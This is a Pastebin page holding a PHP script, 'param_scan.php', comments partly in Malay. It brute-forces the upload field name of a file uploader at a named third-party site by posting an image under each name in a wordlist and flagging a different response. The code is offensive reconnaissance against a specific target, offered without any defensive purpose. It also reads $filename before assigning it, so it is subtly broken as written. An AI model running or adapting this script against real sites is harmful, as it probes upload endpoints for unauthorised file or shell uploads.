API tools faq
paste
tobitaz

param_scan.php

tobitaz
Jun 26th, 2021
1,571
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.98 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. ini_set('max_execution_time', '0');
  3. set_time_limit(0);
  4.  
  5.  
  6.  
  7.  
  8. $url = "https://redspino.com/include/upload.php";//url uploader trget
  9.  
  10. $useragent = $_SERVER['HTTP_USER_AGENT'];
  11. $timeout   = 10;
  12. $file      = realpath($filename);
  13. $dict      = "param.txt";//wordlist param
  14. $wordlist  = file_get_contents($dict);
  15. $filename  = "noel.jpg"; //img small
  16. $kon       = file_get_contents($url);
  17. $saiz      = substr_count($wordlist, PHP_EOL);
  18. $page      = "OFF";//on if uploader ada error msg
  19.  
  20.  
  21.  
  22. function parasc($para)
  23. {
  24. global $url;
  25. global $useragent;
  26. global $timeout;
  27. global $file;
  28. global $filename;
  29.  
  30. $ch = curl_init();
  31. $data = array($para => "@$file".";filename=".$filename);
  32. curl_setopt($ch, CURLOPT_URL, $url);
  33. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  34. curl_setopt($ch, CURLOPT_POST, 1);
  35. curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
  36. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  37. $result = curl_exec($ch);
  38. curl_close($ch);
  39. return $result;
  40. }
  41.  
  42. function cek($konten)
  43. {
  44. global $kon;
  45.  
  46. $str = strpos($konten, $kon);
  47. if($str !== false)
  48.  { return 0; }
  49. else
  50.  { return 1; }
  51. }
  52.  
  53. echo "Start scaning param : ".$url."<br />
  54.     Wordlist : ".$dict."<br >
  55.     Word count : ".$saiz."<br />
  56.     File upload : ".$file."<br /><hr>";
  57. $word = explode(PHP_EOL, $wordlist);
  58.  
  59. $count = 0;
  60. foreach($word as $key => $wl)
  61. {
  62.  $w = preg_replace( "/\r|\n/", "", $wl);
  63.  
  64.  if($page == "ON")
  65.  {
  66.  $res = cek(parasc($w));
  67.   if($res == 1)
  68.   {
  69.   echo "<br />".$w.":found!<br />";
  70.   die();
  71.   }
  72.   else
  73.   {
  74.   $count++;
  75.  
  76.   echo ".";
  77.   flush();
  78.  
  79.   if($count > 20)
  80.    {
  81.    $persen    = 100 * $key/$saiz;
  82.    $per       = round($persen, 2);
  83.    echo $per."% scaning[".$key."]<br />";
  84.    unset($count);
  85.    }
  86.  
  87.   }
  88.  }
  89.  else
  90.  {
  91.  parasc($w);
  92.  $count++;
  93.  
  94.   echo ".";
  95.   flush();
  96.  
  97.   if($count > 20)
  98.    {
  99.    $persen    = 100 * $key/$saiz;
  100.    $per       = round($persen, 2);
  101.    echo $per."% scaning[".$key."]<br />";
  102.    unset($count);
  103.    }
  104.  }
  105. }
  106.  
  107. echo "done";
  108.  
  109.  
  110. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!